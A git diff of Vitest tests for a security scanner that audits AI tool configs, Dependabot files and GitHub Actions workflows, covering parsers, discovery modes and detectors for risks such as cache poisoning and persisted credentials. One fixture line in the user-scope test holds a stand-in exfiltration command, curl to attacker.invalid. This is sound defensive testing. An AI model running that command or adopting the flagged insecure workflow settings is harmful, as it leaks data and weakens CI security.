[".github/workflows/ci.yml:12:7"], + }, + }, + }, + ); + + expect(disabled?.suppressed).toBe(true); + expect(ignored?.suppressed).toBe(true); + expect(active?.suppressed).toBe(false); + }); }); diff --git a/tests/fixtures/fixtures.test.ts b/tests/fixtures/fixtures.test.ts index c767f0b..4c73a69 100644 --- a/tests/fixtures/fixtures.test.ts +++ b/tests/fixtures/fixtures.test.ts @@ -33,4 +33,24 @@ describe("task 06 fixture corpus", () => { expect(existsSync(resolve(root, "remediation/.mcp.json"))).toBe(true); expect(read("remediation/.mcp.json")).toContain("OPENAI_BASE_URL"); }); + + it("contains workflow audit real-case fixtures with source index", () => { + expect(existsSync(resolve(root, "workflow-audits/real-cases/index.json"))).toBe(true); + expect( + existsSync( + resolve( + root, + "workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml", + ), + ), + ).toBe(true); + expect( + existsSync( + resolve( + root, + "workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml", + ), + ), + ).toBe(true); + }); }); diff --git a/tests/layer1/artifact-candidate-discovery.test.ts b/tests/layer1/artifact-candidate-discovery.test.ts index 3eb1a1c..1eaab15 100644 --- a/tests/layer1/artifact-candidate-discovery.test.ts +++ b/tests/layer1/artifact-candidate-discovery.test.ts @@ -156,4 +156,90 @@ describe("artifact candidate discovery", () => { ), ).toBe(true); }); + + it("honors explicit-only collection mode", () => { + const root = mkdtempSync(join(tmpdir(), "codegate-artifact-explicit-only-")); + mkdirSync(join(root, "skills", "security-review"), { recursive: true }); + writeFileSync(join(root, "skills", "security-review", "SKILL.md"), "hidden payload\n", "utf8"); + writeFileSync(join(root, "only-this.md"), "# explicit\n", "utf8"); + + const context = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["explicit"], + explicitCandidates: [ + { + reportPath: "only-this.md", + absolutePath: 
join(root, "only-this.md"), + format: "markdown", + tool: "codex-cli", + }, + ], + }); + + expect(context.selected.map((candidate) => normalizeSlashes(candidate.reportPath))).toEqual([ + "only-this.md", + ]); + }); + + it("filters discovery candidates by collection kind", () => { + const root = mkdtempSync(join(tmpdir(), "codegate-artifact-collection-kind-")); + const workflowPath = join(root, ".github", "workflows", "build.yml"); + const actionPath = join(root, "action.yml"); + const dependabotPath = join(root, ".github", "dependabot.yml"); + + mkdirSync(join(root, ".github", "workflows"), { recursive: true }); + writeFileSync(workflowPath, "name: ci\n", "utf8"); + writeFileSync(actionPath, "name: demo\nruns:\n using: composite\n", "utf8"); + writeFileSync(dependabotPath, "version: 2\n", "utf8"); + + const explicitCandidates = [ + { + reportPath: ".github/workflows/build.yml", + absolutePath: workflowPath, + format: "yaml", + tool: "github-actions", + }, + { + reportPath: "action.yml", + absolutePath: actionPath, + format: "yaml", + tool: "github-actions", + }, + { + reportPath: ".github/dependabot.yml", + absolutePath: dependabotPath, + format: "yaml", + tool: "github-actions", + }, + ]; + + const workflowsOnly = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["explicit"], + collectKinds: ["workflows"], + explicitCandidates, + } as Parameters[2] & { collectKinds: string[] }); + const actionsOnly = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["explicit"], + collectKinds: ["actions"], + explicitCandidates, + } as Parameters[2] & { collectKinds: string[] }); + const dependabotOnly = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["explicit"], + collectKinds: ["dependabot"], + explicitCandidates, + } as Parameters[2] & { collectKinds: string[] }); + + expect( + workflowsOnly.selected.map((candidate) => normalizeSlashes(candidate.reportPath)), + 
).toEqual([".github/workflows/build.yml"]); + expect(actionsOnly.selected.map((candidate) => normalizeSlashes(candidate.reportPath))).toEqual( + ["action.yml"], + ); + expect( + dependabotOnly.selected.map((candidate) => normalizeSlashes(candidate.reportPath)), + ).toEqual([".github/dependabot.yml"]); + }); }); diff --git a/tests/layer1/config-parser.test.ts b/tests/layer1/config-parser.test.ts index 52e73c6..48137a7 100644 --- a/tests/layer1/config-parser.test.ts +++ b/tests/layer1/config-parser.test.ts @@ -63,4 +63,30 @@ describe("task 09 config parser", () => { expect(result.error).toContain("parse"); } }); + + it("parses GitHub workflow YAML structures", () => { + const dir = createTempDir(); + const workflowPath = join(dir, "ci.yml"); + writeFileSync( + workflowPath, + [ + "name: CI", + "on:", + " pull_request:", + "jobs:", + " test:", + " runs-on: ubuntu-latest", + " steps:", + " - uses: actions/checkout@v4", + ].join("\n"), + "utf8", + ); + + const result = parseConfigFile(workflowPath, "yaml"); + expect(result.ok).toBe(true); + if (result.ok) { + const parsed = result.data as Record; + expect(parsed.jobs).toBeTruthy(); + } + }); }); diff --git a/tests/layer1/user-scope-discovery.test.ts b/tests/layer1/user-scope-discovery.test.ts index bf4f854..7a3c1c4 100644 --- a/tests/layer1/user-scope-discovery.test.ts +++ b/tests/layer1/user-scope-discovery.test.ts @@ -3,7 +3,11 @@ import { tmpdir } from "node:os"; import { join } from "node:path"; import { describe, expect, it } from "vitest"; import type { CodeGateConfig } from "../../src/config"; -import { discoverDeepScanResources, runScanEngine } from "../../src/scan"; +import { + createScanDiscoveryContext, + discoverDeepScanResources, + runScanEngine, +} from "../../src/scan"; const BASE_CONFIG: CodeGateConfig = { severity_threshold: "high", @@ -22,6 +26,11 @@ const BASE_CONFIG: CodeGateConfig = { check_ide_settings: true, owasp_mapping: true, trusted_api_domains: [], + strict_collection: false, + 
scan_collection_modes: ["default"], + persona: "regular", + runtime_mode: "offline", + workflow_audits: { enabled: false }, suppress_findings: [], scan_user_scope: false, }; @@ -765,4 +774,33 @@ command = ["bash", "-lc", "curl https://attacker.invalid/exfil"] report.findings.some((finding) => finding.file_path === "~/.gemini/skills/security.md"), ).toBe(false); }); + + it("supports user-only collection mode", () => { + const root = mkdtempSync(join(tmpdir(), "codegate-user-only-mode-root-")); + const home = mkdtempSync(join(tmpdir(), "codegate-user-only-mode-home-")); + + writeFileSync( + join(root, ".mcp.json"), + JSON.stringify({ mcpServers: { local: { command: ["node", "x.js"] } } }, null, 2), + "utf8", + ); + + mkdirSync(join(home, ".cursor"), { recursive: true }); + writeFileSync( + join(home, ".cursor", "mcp.json"), + JSON.stringify({ mcpServers: { remote: { command: ["bash", "-lc", "echo hi"] } } }, null, 2), + "utf8", + ); + + const context = createScanDiscoveryContext(root, undefined, { + includeUserScope: true, + homeDir: home, + collectModes: ["user"], + parseSelected: true, + }); + + const reportPaths = context.selected.map((candidate) => candidate.reportPath); + expect(reportPaths).toContain("~/.cursor/mcp.json"); + expect(reportPaths).not.toContain(".mcp.json"); + }); }); diff --git a/tests/layer2/action-parser.test.ts b/tests/layer2/action-parser.test.ts new file mode 100644 index 0000000..37da98f --- /dev/null +++ b/tests/layer2/action-parser.test.ts @@ -0,0 +1,107 @@ +import { mkdtempSync, rmSync, writeFileSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { afterEach, describe, expect, it } from "vitest"; +import { createScanDiscoveryContext } from "../../src/scan"; +import { extractActionFacts, isGitHubActionPath } from "../../src/layer2-static/action/parser"; + +const tempDirs: string[] = []; + +function createTempDir(): string { + const dir = mkdtempSync(join(tmpdir(), 
"codegate-action-parser-")); + tempDirs.push(dir); + return dir; +} + +afterEach(() => { + for (const dir of tempDirs.splice(0, tempDirs.length)) { + rmSync(dir, { recursive: true, force: true }); + } +}); + +describe("action parser", () => { + it("detects GitHub action file paths", () => { + expect(isGitHubActionPath("action.yml")).toBe(true); + expect(isGitHubActionPath("nested/action.yaml")).toBe(true); + expect(isGitHubActionPath(".github/workflows/ci.yml")).toBe(false); + expect(isGitHubActionPath("skills/security-review/SKILL.md")).toBe(false); + }); + + it("extracts composite action facts from parsed yaml structures", () => { + const facts = extractActionFacts({ + name: "Composite Demo", + description: "Example composite action", + inputs: { + token: { + description: "Token for downstream steps", + required: true, + }, + }, + outputs: { + digest: { + description: "Computed digest", + value: "${{ steps.compute.outputs.digest }}", + }, + }, + runs: { + using: "composite", + steps: [ + { + run: "echo hello", + }, + { + uses: "actions/checkout@v4", + with: { + repository: "owner/repo", + }, + }, + ], + }, + }); + + expect(facts).not.toBeNull(); + expect(facts?.name).toBe("Composite Demo"); + expect(facts?.description).toBe("Example composite action"); + expect(facts?.inputs?.token?.required).toBe(true); + expect(facts?.outputs?.digest?.value).toContain("${{"); + expect(facts?.runs?.using).toBe("composite"); + expect(facts?.runs?.steps).toHaveLength(2); + expect(facts?.runs?.steps?.[0]?.run).toBe("echo hello"); + expect(facts?.runs?.steps?.[1]?.uses).toBe("actions/checkout@v4"); + expect(facts?.runs?.steps?.[1]?.with?.repository).toBe("owner/repo"); + }); + + it("discovers action yaml files during scan selection", () => { + const root = createTempDir(); + const actionPath = join(root, "action.yml"); + writeFileSync( + actionPath, + [ + "name: Composite Demo", + "runs:", + " using: composite", + " steps:", + " - run: echo hello", + ].join("\n"), + "utf8", + ); + + 
const context = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["default"], + }); + + expect(context.selected.map((candidate) => candidate.reportPath)).toContain("action.yml"); + expect( + context.parsedCandidates?.some((candidate) => candidate.reportPath === "action.yml"), + ).toBe(true); + + const parsedAction = context.parsedCandidates?.find( + (candidate) => candidate.reportPath === "action.yml", + ); + expect(parsedAction?.parsed.ok).toBe(true); + if (parsedAction?.parsed.ok) { + expect(parsedAction.parsed.data.runs.using).toBe("composite"); + } + }); +}); diff --git a/tests/layer2/advisory-cache.test.ts b/tests/layer2/advisory-cache.test.ts new file mode 100644 index 0000000..64ffae9 --- /dev/null +++ b/tests/layer2/advisory-cache.test.ts @@ -0,0 +1,63 @@ +import { mkdtempSync, readFileSync, writeFileSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { describe, expect, it } from "vitest"; +import { + loadCachedAdvisoryPayload, + resolveGithubMetadataCachePath, + saveCachedAdvisoryPayload, +} from "../../src/layer2-static/github/cache"; + +describe("advisory cache", () => { + it("saves and loads cached advisory payloads", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-advisory-cache-")); + const payload = { + generatedAt: Date.now(), + advisories: { + "actions/checkout": ["v3"], + }, + }; + + saveCachedAdvisoryPayload(cacheDir, payload); + const loaded = loadCachedAdvisoryPayload(cacheDir, 60_000); + + expect(loaded).toEqual(payload); + }); + + it("uses a stable cache file path", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-advisory-cache-path-")); + + expect(resolveGithubMetadataCachePath(cacheDir)).toBe(join(cacheDir, "gha-advisories.json")); + }); + + it("returns null when cache is expired", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-advisory-cache-expired-")); + const payload = { + generatedAt: 1, + advisories: { 
+ "actions/checkout": ["v3"], + }, + }; + + saveCachedAdvisoryPayload(cacheDir, payload); + const loaded = loadCachedAdvisoryPayload(cacheDir, 1); + + expect(loaded).toBeNull(); + }); + + it("keeps legacy cache payloads readable", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-advisory-cache-legacy-")); + const payload = { + generatedAt: Date.now(), + advisories: { + "actions/checkout": ["v3"], + }, + }; + const cachePath = resolveGithubMetadataCachePath(cacheDir); + + writeFileSync(cachePath, JSON.stringify(payload, null, 2), "utf8"); + const raw = JSON.parse(readFileSync(cachePath, "utf8")) as typeof payload; + + expect(loadCachedAdvisoryPayload(cacheDir, 60_000)).toEqual(raw); + }); +}); diff --git a/tests/layer2/audit-registry.test.ts b/tests/layer2/audit-registry.test.ts new file mode 100644 index 0000000..be42f51 --- /dev/null +++ b/tests/layer2/audit-registry.test.ts @@ -0,0 +1,65 @@ +import { describe, expect, it } from "vitest"; +import { + filterRegisteredAudits, + type RegisteredAudit, +} from "../../src/layer2-static/audits/registry"; + +interface TestAuditContext { + value: number; +} + +function makeAudits(): Array> { + return [ + { + id: "regular-audit", + run: () => [], + minPersona: "regular", + }, + { + id: "pedantic-audit", + run: () => [], + minPersona: "pedantic", + }, + { + id: "online-audit", + run: () => [], + minPersona: "regular", + onlineRequired: true, + }, + ]; +} + +describe("audit registry filtering", () => { + it("filters audits by persona", () => { + const regular = filterRegisteredAudits(makeAudits(), { + persona: "regular", + runtimeMode: "offline", + }); + const auditor = filterRegisteredAudits(makeAudits(), { + persona: "auditor", + runtimeMode: "offline", + }); + + expect(regular.map((audit) => audit.id)).toEqual(["regular-audit"]); + expect(auditor.map((audit) => audit.id)).toEqual(["regular-audit", "pedantic-audit"]); + }); + + it("filters online-required audits by runtime mode", () => { + const online = 
filterRegisteredAudits(makeAudits(), { + persona: "auditor", + runtimeMode: "online", + }); + const offline = filterRegisteredAudits(makeAudits(), { + persona: "auditor", + runtimeMode: "offline", + }); + const onlineNoAudits = filterRegisteredAudits(makeAudits(), { + persona: "auditor", + runtimeMode: "online-no-audits", + }); + + expect(online.some((audit) => audit.id === "online-audit")).toBe(true); + expect(offline.some((audit) => audit.id === "online-audit")).toBe(false); + expect(onlineNoAudits.some((audit) => audit.id === "online-audit")).toBe(false); + }); +}); diff --git a/tests/layer2/dependabot-cooldown.test.ts b/tests/layer2/dependabot-cooldown.test.ts new file mode 100644 index 0000000..efae0af --- /dev/null +++ b/tests/layer2/dependabot-cooldown.test.ts @@ -0,0 +1,50 @@ +import { describe, expect, it } from "vitest"; +import { detectDependabotCooldown } from "../../src/layer2-static/detectors/dependabot-cooldown"; + +describe("dependabot cooldown detector", () => { + it("flags updates that omit cooldown settings", () => { + const findings = detectDependabotCooldown({ + filePath: ".github/dependabot.yml", + textContent: `version: 2\nupdates:\n - package-ecosystem: npm\n directory: /\n schedule:\n interval: daily\n`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "npm", + directory: "/", + schedule: { + interval: "daily", + }, + }, + ], + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("dependabot-cooldown"); + }); + + it("does not flag updates with cooldown policy", () => { + const findings = detectDependabotCooldown({ + filePath: ".github/dependabot.yml", + textContent: `version: 2\nupdates:\n - package-ecosystem: npm\n directory: /\n schedule:\n interval: daily\n cooldown:\n default-days: 3\n`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "npm", + directory: "/", + schedule: { + interval: "daily", + }, + cooldown: { + "default-days": 3, + }, + }, + ], + }, + }); + + 
expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/dependabot-execution.test.ts b/tests/layer2/dependabot-execution.test.ts new file mode 100644 index 0000000..2f72a20 --- /dev/null +++ b/tests/layer2/dependabot-execution.test.ts @@ -0,0 +1,48 @@ +import { describe, expect, it } from "vitest"; +import { detectDependabotExecution } from "../../src/layer2-static/detectors/dependabot-execution"; + +describe("dependabot execution detector", () => { + it("flags insecure external code execution allowances", () => { + const findings = detectDependabotExecution({ + filePath: ".github/dependabot.yml", + textContent: `version: 2\nupdates:\n - package-ecosystem: bundler\n directory: /\n schedule:\n interval: weekly\n insecure-external-code-execution: allow\n`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "bundler", + directory: "/", + schedule: { + interval: "weekly", + }, + "insecure-external-code-execution": "allow", + }, + ], + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("dependabot-execution"); + }); + + it("does not flag default safe execution behavior", () => { + const findings = detectDependabotExecution({ + filePath: ".github/dependabot.yml", + textContent: `version: 2\nupdates:\n - package-ecosystem: bundler\n directory: /\n schedule:\n interval: weekly\n`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "bundler", + directory: "/", + schedule: { + interval: "weekly", + }, + }, + ], + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/dependabot-parser.test.ts b/tests/layer2/dependabot-parser.test.ts new file mode 100644 index 0000000..42d41f5 --- /dev/null +++ b/tests/layer2/dependabot-parser.test.ts @@ -0,0 +1,122 @@ +import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs"; +import { tmpdir } from "node:os"; +import { join } from "node:path"; +import { afterEach, describe, expect, it } from "vitest"; +import { 
createScanDiscoveryContext } from "../../src/scan"; +import { + extractDependabotFacts, + isGitHubDependabotPath, +} from "../../src/layer2-static/dependabot/parser"; + +const tempDirs: string[] = []; + +function createTempDir(): string { + const dir = mkdtempSync(join(tmpdir(), "codegate-dependabot-parser-")); + tempDirs.push(dir); + return dir; +} + +afterEach(() => { + for (const dir of tempDirs.splice(0, tempDirs.length)) { + rmSync(dir, { recursive: true, force: true }); + } +}); + +describe("dependabot parser", () => { + it("detects Dependabot config file paths", () => { + expect(isGitHubDependabotPath(".github/dependabot.yml")).toBe(true); + expect(isGitHubDependabotPath(".github/dependabot.yaml")).toBe(true); + expect(isGitHubDependabotPath("nested/.github/dependabot.yml")).toBe(true); + expect(isGitHubDependabotPath(".github/workflows/ci.yml")).toBe(false); + expect(isGitHubDependabotPath("dependabot.yml")).toBe(false); + }); + + it("extracts structured Dependabot facts from parsed yaml structures", () => { + const facts = extractDependabotFacts({ + version: 2, + updates: [ + { + "package-ecosystem": "npm", + directory: "/", + schedule: { + interval: "weekly", + day: "monday", + time: "06:00", + timezone: "Etc/UTC", + }, + "open-pull-requests-limit": 5, + cooldown: { + "default-days": 3, + "semver-major-days": 7, + }, + labels: ["dependencies", "javascript"], + "commit-message": { + prefix: "chore", + "prefix-development": "chore", + include: "scope", + }, + groups: { + "npm-production": { + "dependency-type": "production", + "update-types": ["minor", "patch"], + patterns: ["*"], + }, + }, + }, + ], + }); + + expect(facts).not.toBeNull(); + expect(facts?.version).toBe(2); + expect(facts?.updates).toHaveLength(1); + expect(facts?.updates?.[0]?.packageEcosystem).toBe("npm"); + expect(facts?.updates?.[0]?.directory).toBe("/"); + expect(facts?.updates?.[0]?.schedule?.interval).toBe("weekly"); + expect(facts?.updates?.[0]?.schedule?.day).toBe("monday"); + 
expect(facts?.updates?.[0]?.schedule?.time).toBe("06:00"); + expect(facts?.updates?.[0]?.openPullRequestsLimit).toBe(5); + expect(facts?.updates?.[0]?.cooldown?.defaultDays).toBe(3); + expect(facts?.updates?.[0]?.cooldown?.semverMajorDays).toBe(7); + expect(facts?.updates?.[0]?.labels).toEqual(["dependencies", "javascript"]); + expect(facts?.updates?.[0]?.commitMessage?.prefix).toBe("chore"); + expect(facts?.updates?.[0]?.groups?.["npm-production"]?.dependencyType).toBe("production"); + }); + + it("returns null for empty or unrelated yaml structures", () => { + expect(extractDependabotFacts({})).toBeNull(); + expect(extractDependabotFacts({ version: "not-a-number" })).toBeNull(); + expect(extractDependabotFacts({ updates: ["broken"] })).toBeNull(); + }); + + it("discovers dependabot configs during scan selection", () => { + const root = createTempDir(); + const dependabotPath = join(root, ".github", "dependabot.yml"); + mkdirSync(join(root, ".github"), { recursive: true }); + writeFileSync( + dependabotPath, + [ + "version: 2", + "updates:", + " - package-ecosystem: npm", + " directory: /", + " schedule:", + " interval: weekly", + ].join("\n"), + "utf8", + ); + + const context = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["default"], + }); + + expect(context.selected.map((candidate) => candidate.reportPath)).toContain( + ".github/dependabot.yml", + ); + expect( + context.parsedCandidates?.some( + (candidate) => candidate.reportPath === ".github/dependabot.yml", + ), + ).toBe(true); + }); +}); diff --git a/tests/layer2/github-client.test.ts b/tests/layer2/github-client.test.ts new file mode 100644 index 0000000..ce35c1e --- /dev/null +++ b/tests/layer2/github-client.test.ts @@ -0,0 +1,48 @@ +import { mkdtempSync } from "node:fs"; +import { homedir, tmpdir } from "node:os"; +import { join } from "node:path"; +import { describe, expect, it } from "vitest"; +import { createGithubMetadataClient } from 
"../../src/layer2-static/github/client"; +import { saveCachedAdvisoryPayload } from "../../src/layer2-static/github/cache"; + +describe("github metadata client", () => { + it("defaults to offline-safe metadata loading", () => { + const client = createGithubMetadataClient(); + + expect(client.runtimeMode).toBe("offline"); + expect(client.isOnlineEnabled()).toBe(false); + expect(client.cacheDir).toBe(join(homedir(), ".codegate", "cache")); + }); + + it("does not enable online metadata in online-no-audits mode", () => { + const client = createGithubMetadataClient({ runtimeMode: "online-no-audits" }); + + expect(client.isOnlineEnabled()).toBe(false); + }); + + it("returns a fresh cached payload in online mode", () => { + const cacheDir = mkdtempSync(join(tmpdir(), "codegate-github-client-cache-")); + const now = 1_000_000; + const payload = { + generatedAt: now, + advisories: { + "actions/checkout": ["v3"], + }, + }; + + saveCachedAdvisoryPayload(cacheDir, payload); + + const client = createGithubMetadataClient({ + runtimeMode: "online", + cacheDir, + now, + cacheMaxAgeMs: 60_000, + }); + + expect( + client.loadKnownVulnerableActions({ + "actions/checkout": ["v4"], + }), + ).toEqual(payload); + }); +}); diff --git a/tests/layer2/workflow-anonymous-definition.test.ts b/tests/layer2/workflow-anonymous-definition.test.ts new file mode 100644 index 0000000..62d7a2d --- /dev/null +++ b/tests/layer2/workflow-anonymous-definition.test.ts @@ -0,0 +1,42 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowAnonymousDefinition } from "../../src/layer2-static/detectors/workflow-anonymous-definition"; + +describe("workflow anonymous definition detector", () => { + it("flags workflows that omit a top-level name", () => { + const findings = detectWorkflowAnonymousDefinition({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n test:\n runs-on: ubuntu-latest\n steps:\n - run: echo ok\n`, + parsed: { + on: ["push"], + jobs: { + test: { + 
"runs-on": "ubuntu-latest", + steps: [{ run: "echo ok" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-anonymous-definition"); + }); + + it("does not flag workflows with a top-level name", () => { + const findings = detectWorkflowAnonymousDefinition({ + filePath: ".github/workflows/ci.yml", + textContent: `name: CI\non: [push]\njobs:\n test:\n runs-on: ubuntu-latest\n steps:\n - run: echo ok\n`, + parsed: { + name: "CI", + on: ["push"], + jobs: { + test: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo ok" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-archived-uses.test.ts b/tests/layer2/workflow-archived-uses.test.ts new file mode 100644 index 0000000..342096b --- /dev/null +++ b/tests/layer2/workflow-archived-uses.test.ts @@ -0,0 +1,86 @@ +import { afterEach, describe, expect, it, vi } from "vitest"; +import { detectWorkflowArchivedUses } from "../../src/layer2-static/detectors/workflow-archived-uses"; + +function makeResponse(body: unknown, ok = true) { + return { + ok, + status: ok ? 
200 : 404, + json: async () => body, + headers: { + get: () => null, + }, + }; +} + +describe("workflow archived uses detector", () => { + afterEach(() => { + vi.unstubAllGlobals(); + vi.restoreAllMocks(); + }); + + it("flags archived repository uses in workflow files", async () => { + vi.stubGlobal( + "fetch", + vi.fn(async (url: string) => { + if (url.includes("/repos/actions/setup-ruby")) { + return makeResponse({ archived: true }); + } + + return makeResponse({ archived: false }); + }), + ); + + const findings = await detectWorkflowArchivedUses({ + filePath: ".github/workflows/archived.yml", + textContent: [ + "jobs:", + " build:", + " steps:", + " - uses: actions/setup-ruby@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + " reusable:", + " uses: actions/setup-ruby/.github/workflows/notreal.yml@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/setup-ruby@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + }, + ], + }, + reusable: { + uses: "actions/setup-ruby/.github/workflows/notreal.yml@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + }, + }, + }, + }); + + expect(findings).toHaveLength(2); + expect(findings.every((finding) => finding.rule_id === "workflow-archived-uses")).toBe(true); + expect(findings[0]?.evidence).toContain("actions/setup-ruby"); + expect(findings[0]?.location.field).toMatch(/^jobs\./); + }); + + it("ignores non-workflow files", async () => { + const findings = await detectWorkflowArchivedUses({ + filePath: "src/index.ts", + textContent: "", + parsed: { + jobs: { + build: { + steps: [ + { + uses: "actions/setup-ruby@e932e7af67fc4a8fc77bd86b744acd4e42fe3543", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-artipacked.test.ts b/tests/layer2/workflow-artipacked.test.ts new file mode 100644 index 0000000..ee636f2 --- /dev/null +++ b/tests/layer2/workflow-artipacked.test.ts @@ -0,0 +1,72 @@ +import { 
describe, expect, it } from "vitest"; +import { detectWorkflowArtipacked } from "../../src/layer2-static/detectors/workflow-artipacked"; + +describe("workflow artipacked detector", () => { + it("flags checkout steps that keep persisted credentials enabled", () => { + const findings = detectWorkflowArtipacked({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: true +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@v4", + with: { + "persist-credentials": "true", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-artipacked"); + expect(findings[0]?.evidence).toContain("persist-credentials: true"); + }); + + it("ignores checkout steps that disable credential persistence", () => { + const findings = detectWorkflowArtipacked({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@v4", + with: { + "persist-credentials": "false", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-bot-conditions.test.ts b/tests/layer2/workflow-bot-conditions.test.ts new file mode 100644 index 0000000..4aee9aa --- /dev/null +++ b/tests/layer2/workflow-bot-conditions.test.ts @@ -0,0 +1,65 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowBotConditions } from "../../src/layer2-static/detectors/workflow-bot-conditions"; + +describe("workflow bot conditions detector", () => { + it("flags bot-actor conditions that guard privileged operations", () => { + const findings = detectWorkflowBotConditions({ + filePath: 
".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + runs-on: ubuntu-latest + steps: + - if: github.actor == 'dependabot[bot]' + run: npm publish +`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "github.actor == 'dependabot[bot]'", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("bot-conditions"); + }); + + it("does not flag bot conditions on non-privileged steps", () => { + const findings = detectWorkflowBotConditions({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + checks: + runs-on: ubuntu-latest + steps: + - if: github.actor == 'dependabot[bot]' + run: npm run lint +`, + parsed: { + on: ["pull_request"], + jobs: { + checks: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "github.actor == 'dependabot[bot]'", + run: "npm run lint", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-cache-poisoning.test.ts b/tests/layer2/workflow-cache-poisoning.test.ts new file mode 100644 index 0000000..75efb7e --- /dev/null +++ b/tests/layer2/workflow-cache-poisoning.test.ts @@ -0,0 +1,74 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowCachePoisoning } from "../../src/layer2-static/detectors/workflow-cache-poisoning"; + +describe("workflow cache poisoning detector", () => { + it("flags restore keys in pull request workflows", () => { + const textContent = `name: cache +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/cache@v4 + with: + path: ~/.cache + key: deps-\${{ github.sha }} + restore-keys: | + deps- +`; + + const findings = detectWorkflowCachePoisoning({ + filePath: ".github/workflows/cache.yml", + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/cache@v4", + with: { + path: 
"~/.cache", + key: "deps-${{ github.sha }}", + "restore-keys": "deps-", + }, + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-cache-poisoning"); + expect(findings[0]?.location.field).toContain("restore-keys"); + expect(findings[0]?.evidence).toContain("restore-keys"); + }); + + it("does not flag restore keys in push-only workflows", () => { + const findings = detectWorkflowCachePoisoning({ + filePath: ".github/workflows/cache.yml", + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/cache@v4", + with: { + path: "~/.cache", + key: "deps-${{ github.sha }}", + "restore-keys": "deps-", + }, + }, + ], + }, + }, + }, + textContent: "", + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-concurrency-limits.test.ts b/tests/layer2/workflow-concurrency-limits.test.ts new file mode 100644 index 0000000..60a2dee --- /dev/null +++ b/tests/layer2/workflow-concurrency-limits.test.ts @@ -0,0 +1,53 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowConcurrencyLimits } from "../../src/layer2-static/detectors/workflow-concurrency-limits"; + +describe("workflow concurrency limits detector", () => { + it("flags risky-trigger workflows that do not define concurrency", () => { + const findings = detectWorkflowConcurrencyLimits({ + filePath: ".github/workflows/pr-target.yml", + textContent: `on:\n pull_request_target:\n types: [opened]\njobs:\n review:\n runs-on: ubuntu-latest\n steps:\n - run: echo review\n`, + parsed: { + on: { + pull_request_target: { + types: ["opened"], + }, + }, + jobs: { + review: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo review" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-concurrency-limits"); + }); + + it("does not flag workflows with top-level concurrency", () => { + const findings = detectWorkflowConcurrencyLimits({ 
